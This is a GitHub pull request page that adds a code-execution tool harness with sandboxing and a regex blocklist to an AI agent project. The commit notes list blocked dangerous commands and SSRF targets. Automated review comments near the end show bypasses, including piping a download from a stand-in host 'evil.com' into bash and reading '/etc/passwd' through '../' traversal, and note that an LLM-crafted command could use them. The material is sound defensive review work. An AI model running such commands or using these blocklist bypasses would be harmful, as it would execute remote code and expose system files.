Skip to content

Add code execution harness with tool-use support#2

Merged
tuhinkanti merged 10 commits intomainfrom
feature/code-execution-harness
Feb 18, 2026
Merged

Add code execution harness with tool-use support#2
tuhinkanti merged 10 commits intomainfrom
feature/code-execution-harness

Conversation

@tuhinkanti
Copy link
Owner

@tuhinkanti tuhinkanti commented Feb 18, 2026

  • New ai.openclaw.tool package: Tool interface, ToolResult, CodeExecutionTool
  • CodeExecutionTool runs shell commands via ProcessBuilder with timeout
  • LlmResponse structured response type for Anthropic content blocks
  • LlmProvider.completeWithTools() for tool-use API integration
  • AnthropicProvider supports full Anthropic tool-use protocol
  • AgentExecutor agentic loop: call LLM -> execute tools -> loop (max 10)
  • Message extended with toolUseId, toolError, contentBlocks fields
  • System prompt updated with code execution instructions
  • 5 new unit tests for CodeExecutionTool

Open with Devin

- New ai.openclaw.tool package: Tool interface, ToolResult, CodeExecutionTool
- CodeExecutionTool runs shell commands via ProcessBuilder with timeout
- LlmResponse structured response type for Anthropic content blocks
- LlmProvider.completeWithTools() for tool-use API integration
- AnthropicProvider supports full Anthropic tool-use protocol
- AgentExecutor agentic loop: call LLM -> execute tools -> loop (max 10)
- Message extended with toolUseId, toolError, contentBlocks fields
- System prompt updated with code execution instructions
- 5 new unit tests for CodeExecutionTool
devin-ai-integration[bot]

This comment was marked as resolved.

New tools:
- FileReadTool: reads files, lists directories
- FileWriteTool: writes/creates files with auto-created dirs
- WebSearchTool: fetches URLs, strips HTML to text

Infrastructure:
- Dockerfile: multi-stage build (Gradle 8 + JDK 21 → Alpine JRE)
- .github/workflows/ci.yml: build+test + Docker build verification
- .dockerignore: excludes build artifacts from Docker context

Tests:
- FileReadToolTest: 4 tests (read, missing, directory, metadata)
- FileWriteToolTest: 4 tests (create, nested dirs, overwrite, metadata)
- WebSearchToolTest: 4 tests (strip HTML, scripts, invalid URL, metadata)
devin-ai-integration[bot]

This comment was marked as resolved.

…ol message persistence

- AnthropicProvider: merge consecutive tool_result messages into a single
  user message with multiple content blocks (Anthropic API requirement)
- FileReadTool: close Files.list() stream with try-with-resources to
  prevent file descriptor leak on directory listings
- GatewayE2ETest: use random available port instead of hardcoded 18790
  to prevent BindException when tests run in quick succession
- AgentExecutor: persist intermediate tool messages (assistant_tool_use
  and tool_result) via sessionStore.appendMessage() so they survive
  process restarts and session replay is complete
devin-ai-integration[bot]

This comment was marked as resolved.

Docker:
- Run as non-root 'openclaw' user with dedicated /home/openclaw/workspace
- Install bash/curl for tool execution

Tool confinement:
- CodeExecutionTool: default working directory changed to ~/workspace
- FileReadTool: workspace-confined with path normalization validation,
  rejects paths outside workspace root (../escape and absolute paths)
- FileWriteTool: same workspace confinement as FileReadTool
- FileReadTool: large file read now uses bounded BufferedReader instead
  of Files.readString() to prevent OOM on multi-GB files

Tests (22 total):
- FileReadToolTest: 7 tests (read, relative, missing, dir, path escape,
  absolute outside, metadata)
- FileWriteToolTest: 6 tests (create, dirs, overwrite, path escape,
  absolute outside, metadata)
- CodeExecutionToolTest: uses explicit temp dir for working directory
devin-ai-integration[bot]

This comment was marked as resolved.

- CodeExecutionTool: replace StringBuilder with StringBuffer for the
  shared output buffer accessed by both main and reader threads
- Use untimed readerThread.join() in non-timeout path to guarantee
  the reader finishes before accessing the buffer
- 11 blocked patterns: rm -rf /, mkfs, dd to devices, curl|sh, shutdown,
  reboot, chmod 777 /, chown /, kill -9 1, overwrite /etc/
- 10 warned patterns: rm, mv, chmod, chown, curl, wget, sudo, pip/npm/apt install
- Blocked commands return error immediately without execution
- Warned commands log at WARN level before executing
- Both pattern lists configurable via constructor
- 8 new unit tests covering blocked/safe command detection
devin-ai-integration[bot]

This comment was marked as resolved.

The regex now matches -r anywhere in a combined flag group, not just as
a separate flag. Catches rm -fr /, rm -fir /, rm -fr * etc.
Added regression tests for these bypass variants.
- Block absolute path reads via cat/head/tail/less/more/vi/vim/nano to
  paths outside /home/*/workspace (negative lookahead)
- Block SSRF: curl/wget to 169.254.x.x (cloud metadata), 127.0.0.1,
  localhost, [::1], 10.x.x.x, 172.16-31.x.x, 192.168.x.x
- Block symlink creation (ln -s) to prevent workspace escape via
  symlinks that bypass FileReadTool/FileWriteTool path validation
- 4 new tests: absolute path read, workspace read allowed, SSRF, symlink
devin-ai-integration[bot]

This comment was marked as resolved.

- Validate URL before making request: resolve hostname to IP(s) and
  reject loopback, site-local (private), link-local (cloud metadata),
  any-local, and multicast addresses via InetAddress built-in checks
- Block non-http/https schemes (file://, ftp://, etc.)
- Disable redirect-following to prevent redirect-based bypass
- 6 new tests: loopback, localhost-by-name, cloud metadata (169.254.x.x),
  private ranges, non-HTTP schemes, public URL allowed
Track start time before waitFor(), compute remaining timeout budget
after process exits, and use that as the join timeout (+2s grace).
If the reader thread is still alive after the budget (background child
inherited stdout), interrupt it and log a warning.

This bounds total wall-clock time to at most timeoutSeconds + 2s,
preventing indefinite hangs from commands like 'nohup daemon &'.
@tuhinkanti tuhinkanti merged commit 0272777 into main Feb 18, 2026
5 of 6 checks passed
@tuhinkanti tuhinkanti deleted the feature/code-execution-harness branch February 18, 2026 06:51
Copy link

@devin-ai-integration devin-ai-integration bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Devin Review found 2 new potential issues.

View 14 additional findings in Devin Review.

Open in Devin Review

Comment on lines +44 to +45
Pattern.compile("\\bcurl\\s+.*\\|\\s*sh"),
Pattern.compile("\\bwget\\s+.*\\|\\s*sh"),

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🔴 Remote code execution blocklist bypassed with bash instead of sh

The blocked patterns for remote code execution only match piping to literal sh, allowing trivial bypasses like curl http://evil.com/x | bash, curl ... | /bin/sh, wget ... | python3, etc.

Root Cause and Impact

The patterns at src/main/java/ai/openclaw/tool/CodeExecutionTool.java:44-45 are:

Pattern.compile("\\bcurl\\s+.*\\|\\s*sh"),
Pattern.compile("\\bwget\\s+.*\\|\\s*sh"),

These only match when the pipe target is literally sh (optionally preceded by whitespace). They fail to match:

  • curl http://evil.com/script.sh | bash
  • curl http://evil.com/script.sh | /bin/sh
  • curl http://evil.com/script.sh | /bin/bash
  • wget http://evil.com/x | python3
  • curl http://evil.com/x -o /tmp/x && bash /tmp/x

Impact: An LLM-injected or adversarial command can trivially bypass the remote code execution safety guard by using bash or an absolute path to a shell interpreter, completely undermining the blocklist's purpose.

Suggested change
Pattern.compile("\\bcurl\\s+.*\\|\\s*sh"),
Pattern.compile("\\bwget\\s+.*\\|\\s*sh"),
Pattern.compile("\\bcurl\\s+.*\\|\\s*(?:/bin/|/usr/bin/)?(?:sh|bash|zsh|ksh|dash|csh|tcsh|fish|python[23]?|perl|ruby|node)\\b"),
Pattern.compile("\\bwget\\s+.*\\|\\s*(?:/bin/|/usr/bin/)?(?:sh|bash|zsh|ksh|dash|csh|tcsh|fish|python[23]?|perl|ruby|node)\\b"),
Open in Devin Review

Was this helpful? React with 👍 or 👎 to provide feedback.

Pattern.compile("\\b(shutdown|reboot|halt|poweroff)\\b"),
Pattern.compile("\\bkill\\s+-9\\s+1\\b"),
// Absolute path reads outside workspace (cat, head, tail, less, more, vi, nano)
Pattern.compile("\\b(cat|head|tail|less|more|vi|nano|vim)\\s+/(?!home/[^/]+/workspace)"),

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🔴 Absolute-path-read blocklist bypassed via ../ traversal after workspace prefix

The regex for blocking reads of absolute paths outside the workspace can be bypassed using path traversal sequences like cat /home/openclaw/workspace/../../../etc/passwd.

Root Cause and Impact

The pattern at src/main/java/ai/openclaw/tool/CodeExecutionTool.java:50 is:

Pattern.compile("\\b(cat|head|tail|less|more|vi|nano|vim)\\s+/(?!home/[^/]+/workspace)")

The negative lookahead (?!home/[^/]+/workspace) only checks whether the characters immediately following / match home/<user>/workspace. So a path like /home/openclaw/workspace/../../../etc/passwd passes the lookahead (since it starts with home/openclaw/workspace), but the shell resolves ../ segments and ultimately reads /etc/passwd.

Verified behavior:

  • cat /etc/passwdblocked
  • cat /home/openclaw/workspace/file.txtallowed
  • cat /home/openclaw/workspace/../../../etc/passwdallowed ✗ (should be blocked)

Impact: An attacker (or LLM-crafted command) can read arbitrary files outside the workspace by prefixing the path with the allowed workspace directory and then using ../ to traverse out.

Prompt for agents
In src/main/java/ai/openclaw/tool/CodeExecutionTool.java line 50, the regex negative-lookahead approach cannot reliably prevent path traversal via ../ sequences. Consider adding a secondary check: after regex matching, also block commands where the argument path contains ".." segments. One approach is to add another blocked pattern like Pattern.compile("\b(cat|head|tail|less|more|vi|nano|vim)\s+\S*\.\.") to catch any traversal attempts. Alternatively, resolve the path argument to its canonical form before checking whether it falls within the workspace, though this is harder to do purely via regex on shell commands.
Open in Devin Review

Was this helpful? React with 👍 or 👎 to provide feedback.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant

Comments